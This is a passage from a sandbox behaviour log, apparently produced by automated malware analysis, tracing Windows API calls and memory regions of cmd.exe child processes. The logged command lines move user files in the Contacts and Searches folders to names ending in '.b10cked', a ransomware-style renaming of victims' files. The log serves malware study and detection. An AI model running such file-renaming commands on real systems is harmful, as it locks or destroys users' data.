lpFilePart=0x26ec84 | out: lpBuffer="C:\\Users\\Default\\Searches\\INDEXE~1.SEA", lpFilePart=0x26ec84*="INDEXE~1.SEA") returned 0x26 [0217.998] SetErrorMode (uMode=0x0) returned 0x1 [0217.998] GetFileAttributesW (lpFileName="C:\\Users\\Default\\Searches" (normalized: "c:\\users\\default\\searches")) returned 0x13 [0217.998] _wcsicmp (_String1="INDEXE~1.SEA", _String2=".") returned 59 [0217.998] _wcsicmp (_String1="INDEXE~1.SEA", _String2="..") returned 59 [0217.998] GetFileAttributesW (lpFileName="C:\\Users\\Default\\Searches\\INDEXE~1.SEA" (normalized: "c:\\users\\default\\searches\\indexe~1.sea")) returned 0x20 [0217.999] SetErrorMode (uMode=0x0) returned 0x0 [0217.999] SetErrorMode (uMode=0x1) returned 0x0 [0217.999] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\Searches\\INDEXE~1.SEA", nBufferLength=0x104, lpBuffer=0x26f118, lpFilePart=0x26eeb0 | out: lpBuffer="C:\\Users\\Default\\Searches\\INDEXE~1.SEA", lpFilePart=0x26eeb0*="INDEXE~1.SEA") returned 0x26 [0217.999] SetErrorMode (uMode=0x0) returned 0x1 [0217.999] SetErrorMode (uMode=0x0) returned 0x0 [0217.999] SetErrorMode (uMode=0x1) returned 0x0 [0217.999] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\Searches\\Indexed Locations.search-ms.b10cked", nBufferLength=0x104, lpBuffer=0x26f320, lpFilePart=0x26eeb0 | out: lpBuffer="C:\\Users\\Default\\Searches\\Indexed Locations.search-ms.b10cked", lpFilePart=0x26eeb0*="Indexed Locations.search-ms.b10cked") returned 0x3d [0217.999] SetErrorMode (uMode=0x0) returned 0x1 [0217.999] SetLastError (dwErrCode=0x0) [0217.999] GetFileAttributesW (lpFileName="C:\\Users\\Default\\Searches\\Indexed Locations.search-ms.b10cked" (normalized: "c:\\users\\default\\searches\\indexed locations.search-ms.b10cked")) returned 0xffffffff [0217.999] GetLastError () returned 0x2 [0217.999] FindFirstFileExW (in: lpFileName="C:\\Users\\Default\\Searches\\INDEXE~1.SEA", fInfoLevelId=0x1, lpFindFileData=0x26e82c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26e82c) returned 0x310e90 [0217.999] FindNextFileW (in: hFindFile=0x310e90, lpFindFileData=0x26e82c | out: lpFindFileData=0x26e82c) returned 0 [0218.000] GetLastError () returned 0x12 [0218.000] FindClose (in: hFindFile=0x310e90 | out: hFindFile=0x310e90) returned 1 [0218.000] FindFirstFileExW (in: lpFileName="C:\\Users\\Default\\Searches\\INDEXE~1.SEA", fInfoLevelId=0x1, lpFindFileData=0x321bf8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x321bf8) returned 0x310e90 [0218.001] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\Searches\\Indexed Locations.search-ms.b10cked", nBufferLength=0x104, lpBuffer=0x26eac4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\Searches\\Indexed Locations.search-ms.b10cked", lpFilePart=0x0) returned 0x3d [0218.001] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\Searches\\Indexed Locations.search-ms", nBufferLength=0x104, lpBuffer=0x26eac4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\Searches\\Indexed Locations.search-ms", lpFilePart=0x0) returned 0x35 [0218.001] GetFileAttributesW (lpFileName="C:\\Users\\Default\\Searches\\Indexed Locations.search-ms" (normalized: "c:\\users\\default\\searches\\indexed locations.search-ms")) returned 0x20 [0218.001] MoveFileExW (lpExistingFileName="C:\\Users\\Default\\Searches\\Indexed Locations.search-ms" (normalized: "c:\\users\\default\\searches\\indexed locations.search-ms"), lpNewFileName="C:\\Users\\Default\\Searches\\Indexed Locations.search-ms.b10cked" (normalized: "c:\\users\\default\\searches\\indexed locations.search-ms.b10cked"), dwFlags=0x3) returned 1 [0218.001] FindClose (in: hFindFile=0x310e90 | out: hFindFile=0x310e90) returned 1 [0218.001] _vsnwprintf (in: _Buffer=0x49ff5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x26ea78 | out: _Buffer=" 1") returned 9 [0218.001] _get_osfhandle (_FileHandle=1) returned 0x7 [0218.001] GetFileType (hFile=0x7) returned 0x2 [0218.002] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0218.002] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x26ea04 | out: lpMode=0x26ea04) returned 1 [0218.002] _get_osfhandle (_FileHandle=1) returned 0x7 [0218.002] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x26ea38 | out: lpConsoleScreenBufferInfo=0x26ea38) returned 1 [0218.002] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a004640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0218.002] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a004640, nSize=0x2000, Arguments=0x26ea78 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0218.002] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a004640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x26ea5c, lpReserved=0x0 | out: lpBuffer=0x4a004640*, lpNumberOfCharsWritten=0x26ea5c*=0x1a) returned 1 [0218.003] _get_osfhandle (_FileHandle=1) returned 0x7 [0218.003] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0218.003] _get_osfhandle (_FileHandle=1) returned 0x7 [0218.003] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49ff41ac | out: lpMode=0x49ff41ac) returned 1 [0218.003] _get_osfhandle (_FileHandle=0) returned 0x3 [0218.003] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49ff41b0 | out: lpMode=0x49ff41b0) returned 1 [0218.003] SetConsoleInputExeNameW () returned 0x1 [0218.003] GetConsoleOutputCP () returned 0x1b5 [0218.003] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49ff4260 | out: lpCPInfo=0x49ff4260) returned 1 [0218.003] SetThreadUILanguage (LangId=0x0) returned 0x409 [0218.003] exit (_Code=0) Process: id = "559" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16ce0" os_pid = "0x968" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Contacts\\ADMINI~1.CON\" \"C:\\Users\\EEBsYm5\\Contacts\\Administrator.contact.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 32489 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 32490 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 32491 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 32492 start_va = 0x210000 end_va = 0x30ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 32493 start_va = 0x49fd0000 end_va = 0x4a01bfff entry_point = 0x49fd0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 32494 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 32495 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 32496 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 32497 start_va = 0x7ffd6000 end_va = 0x7ffd6fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd6000" filename = "" Region: id = 32498 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 32567 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 32568 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 32569 start_va = 0x80000 end_va = 0x8ffff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 32570 start_va = 0xb0000 end_va = 0x1affff entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 32571 start_va = 0x310000 end_va = 0x376fff entry_point = 0x310000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 32572 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 32573 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 32574 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 32575 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 32576 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 32577 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 32578 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 32579 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 32580 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 32581 start_va = 0x380000 end_va = 0x447fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000380000" filename = "" Region: id = 32582 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 32583 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 32584 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 32585 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 32586 start_va = 0x70000 end_va = 0x70fff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 32587 start_va = 0x90000 end_va = 0x90fff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 32588 start_va = 0x450000 end_va = 0x550fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 32589 start_va = 0x560000 end_va = 0x115ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 32590 start_va = 0x1160000 end_va = 0x12c2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001160000" filename = "" Thread: id = 763 os_tid = 0xaa4 [0217.970] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x30f7b4 | out: lpSystemTimeAsFileTime=0x30f7b4*(dwLowDateTime=0xb6b7cac0, dwHighDateTime=0x1d440a9)) [0217.970] GetCurrentProcessId () returned 0x968 [0217.970] GetCurrentThreadId () returned 0xaa4 [0217.970] GetTickCount () returned 0x3ceb3 [0217.970] QueryPerformanceCounter (in: lpPerformanceCount=0x30f7ac | out: lpPerformanceCount=0x30f7ac*=27475967004) returned 1 [0217.971] GetModuleHandleA (lpModuleName=0x0) returned 0x49fd0000 [0217.971] __set_app_type (_Type=0x1) [0217.971] __p__fmode () returned 0x76b331f4 [0217.971] __p__commode () returned 0x76b331fc [0217.971] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49ff21a6) returned 0x0 [0217.971] __getmainargs (in: _Argc=0x49ff4238, _Argv=0x49ff4240, _Env=0x49ff423c, _DoWildCard=0, _StartInfo=0x49ff4140 | out: _Argc=0x49ff4238, _Argv=0x49ff4240, _Env=0x49ff423c) returned 0 [0217.971] GetCurrentThreadId () returned 0xaa4 [0217.971] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xaa4) returned 0x38 [0217.972] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0217.972] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0217.972] SetThreadUILanguage (LangId=0x0) returned 0x409 [0217.972] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0217.972] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x30f744 | out: phkResult=0x30f744*=0x0) returned 0x2 [0217.972] VirtualQuery (in: lpAddress=0x30f77b, lpBuffer=0x30f714, dwLength=0x1c | out: lpBuffer=0x30f714*(BaseAddress=0x30f000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0217.972] VirtualQuery (in: lpAddress=0x210000, lpBuffer=0x30f714, dwLength=0x1c | out: lpBuffer=0x30f714*(BaseAddress=0x210000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0217.972] VirtualQuery (in: lpAddress=0x211000, lpBuffer=0x30f714, dwLength=0x1c | out: lpBuffer=0x30f714*(BaseAddress=0x211000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0217.972] VirtualQuery (in: lpAddress=0x213000, lpBuffer=0x30f714, dwLength=0x1c | out: lpBuffer=0x30f714*(BaseAddress=0x213000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0217.972] VirtualQuery (in: lpAddress=0x310000, lpBuffer=0x30f714, dwLength=0x1c | out: lpBuffer=0x30f714*(BaseAddress=0x310000, AllocationBase=0x310000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0217.972] GetConsoleOutputCP () returned 0x1b5 [0217.972] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49ff4260 | out: lpCPInfo=0x49ff4260) returned 1 [0217.972] SetConsoleCtrlHandler (HandlerRoutine=0x49fee72a, Add=1) returned 1 [0217.972] _get_osfhandle (_FileHandle=1) returned 0x7 [0217.972] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0217.973] _get_osfhandle (_FileHandle=1) returned 0x7 [0217.973] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49ff41ac | out: lpMode=0x49ff41ac) returned 1 [0217.973] _get_osfhandle (_FileHandle=1) returned 0x7 [0217.973] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0217.973] _get_osfhandle (_FileHandle=0) returned 0x3 [0217.973] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49ff41b0 | out: lpMode=0x49ff41b0) returned 1 [0217.973] _get_osfhandle (_FileHandle=0) returned 0x3 [0217.973] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0217.973] GetEnvironmentStringsW () returned 0xc0180* [0217.973] FreeEnvironmentStringsW (penv=0xc0180) returned 1 [0217.973] GetEnvironmentStringsW () returned 0xc0180* [0217.973] FreeEnvironmentStringsW (penv=0xc0180) returned 1 [0217.974] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x30e6b4 | out: phkResult=0x30e6b4*=0x40) returned 0x0 [0217.974] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x30e6bc, lpData=0x30e6c0, lpcbData=0x30e6b8*=0x1000 | out: lpType=0x30e6bc*=0x0, lpData=0x30e6c0*=0xa8, lpcbData=0x30e6b8*=0x1000) returned 0x2 [0217.974] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x30e6bc, lpData=0x30e6c0, lpcbData=0x30e6b8*=0x1000 | out: lpType=0x30e6bc*=0x4, lpData=0x30e6c0*=0x1, lpcbData=0x30e6b8*=0x4) returned 0x0 [0217.974] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x30e6bc, lpData=0x30e6c0, lpcbData=0x30e6b8*=0x1000 | out: lpType=0x30e6bc*=0x0, lpData=0x30e6c0*=0x1, lpcbData=0x30e6b8*=0x1000) returned 0x2 [0217.974] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x30e6bc, lpData=0x30e6c0, lpcbData=0x30e6b8*=0x1000 | out: lpType=0x30e6bc*=0x4, lpData=0x30e6c0*=0x0, lpcbData=0x30e6b8*=0x4) returned 0x0 [0217.974] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x30e6bc, lpData=0x30e6c0, lpcbData=0x30e6b8*=0x1000 | out: lpType=0x30e6bc*=0x4, lpData=0x30e6c0*=0x40, lpcbData=0x30e6b8*=0x4) returned 0x0 [0217.974] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x30e6bc, lpData=0x30e6c0, lpcbData=0x30e6b8*=0x1000 | out: lpType=0x30e6bc*=0x4, lpData=0x30e6c0*=0x40, lpcbData=0x30e6b8*=0x4) returned 0x0 [0217.974] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x30e6bc, lpData=0x30e6c0, lpcbData=0x30e6b8*=0x1000 | out: lpType=0x30e6bc*=0x0, lpData=0x30e6c0*=0x40, lpcbData=0x30e6b8*=0x1000) returned 0x2 [0217.974] RegCloseKey (hKey=0x40) returned 0x0 [0217.974] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x30e6b4 | out: phkResult=0x30e6b4*=0x40) returned 0x0 [0217.974] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x30e6bc, lpData=0x30e6c0, lpcbData=0x30e6b8*=0x1000 | out: lpType=0x30e6bc*=0x0, lpData=0x30e6c0*=0x40, lpcbData=0x30e6b8*=0x1000) returned 0x2 [0217.974] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x30e6bc, lpData=0x30e6c0, lpcbData=0x30e6b8*=0x1000 | out: lpType=0x30e6bc*=0x4, lpData=0x30e6c0*=0x1, lpcbData=0x30e6b8*=0x4) returned 0x0 [0217.974] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x30e6bc, lpData=0x30e6c0, lpcbData=0x30e6b8*=0x1000 | out: lpType=0x30e6bc*=0x0, lpData=0x30e6c0*=0x1, lpcbData=0x30e6b8*=0x1000) returned 0x2 [0217.974] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x30e6bc, lpData=0x30e6c0, lpcbData=0x30e6b8*=0x1000 | out: lpType=0x30e6bc*=0x4, lpData=0x30e6c0*=0x0, lpcbData=0x30e6b8*=0x4) returned 0x0 [0217.974] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x30e6bc, lpData=0x30e6c0, lpcbData=0x30e6b8*=0x1000 | out: lpType=0x30e6bc*=0x4, lpData=0x30e6c0*=0x9, lpcbData=0x30e6b8*=0x4) returned 0x0 [0217.974] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x30e6bc, lpData=0x30e6c0, lpcbData=0x30e6b8*=0x1000 | out: lpType=0x30e6bc*=0x4, lpData=0x30e6c0*=0x9, lpcbData=0x30e6b8*=0x4) returned 0x0 [0217.974] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x30e6bc, lpData=0x30e6c0, lpcbData=0x30e6b8*=0x1000 | out: lpType=0x30e6bc*=0x0, lpData=0x30e6c0*=0x9, lpcbData=0x30e6b8*=0x1000) returned 0x2 [0217.974] RegCloseKey (hKey=0x40) returned 0x0 [0217.974] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863b3 [0217.974] srand (_Seed=0x5b8863b3) [0217.974] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Contacts\\ADMINI~1.CON\" \"C:\\Users\\EEBsYm5\\Contacts\\Administrator.contact.b10cked\"" [0217.974] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Contacts\\ADMINI~1.CON\" \"C:\\Users\\EEBsYm5\\Contacts\\Administrator.contact.b10cked\"" [0217.974] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49ff5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0217.975] GetModuleFileNameW (in: hModule=0x0, lpFilename=0xc18e0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0217.975] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a000640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0217.975] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a000640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0217.975] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a000640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0217.975] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0217.975] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0217.975] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0217.975] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0217.975] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0217.975] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0217.975] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0217.975] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0217.975] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0217.975] GetEnvironmentStringsW () returned 0xc22d0* [0217.975] FreeEnvironmentStringsW (penv=0xc22d0) returned 1 [0217.975] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a000640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0217.975] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a000640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0217.975] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0217.975] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0217.975] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0217.975] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0217.976] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0217.976] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0217.976] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0217.976] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0217.976] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x30f480 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0217.976] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x30f480, lpFilePart=0x30f47c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x30f47c*="Desktop") returned 0x18 [0217.976] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0217.976] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x30f1fc | out: lpFindFileData=0x30f1fc) returned 0xc0010 [0217.976] FindClose (in: hFindFile=0xc0010 | out: hFindFile=0xc0010) returned 1 [0217.976] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x30f1fc | out: lpFindFileData=0x30f1fc) returned 0xc0010 [0217.976] FindClose (in: hFindFile=0xc0010 | out: hFindFile=0xc0010) returned 1 [0217.976] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x30f1fc | out: lpFindFileData=0x30f1fc) returned 0xc0010 [0217.976] FindClose (in: hFindFile=0xc0010 | out: hFindFile=0xc0010) returned 1 [0217.977] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0217.977] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0217.977] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0217.977] GetEnvironmentStringsW () returned 0xc2af0* [0217.977] FreeEnvironmentStringsW (penv=0xc2af0) returned 1 [0217.977] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49ff5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0217.977] GetConsoleOutputCP () returned 0x1b5 [0217.977] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49ff4260 | out: lpCPInfo=0x49ff4260) returned 1 [0217.977] GetUserDefaultLCID () returned 0x409 [0217.979] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x49ff4950, cchData=8 | out: lpLCData=":") returned 2 [0217.979] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x30f5c0, cchData=128 | out: lpLCData="0") returned 2 [0217.979] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x30f5c0, cchData=128 | out: lpLCData="0") returned 2 [0217.979] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x30f5c0, cchData=128 | out: lpLCData="1") returned 2 [0217.979] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x49ff4940, cchData=8 | out: lpLCData="/") returned 2 [0217.979] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x49ff4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0217.979] 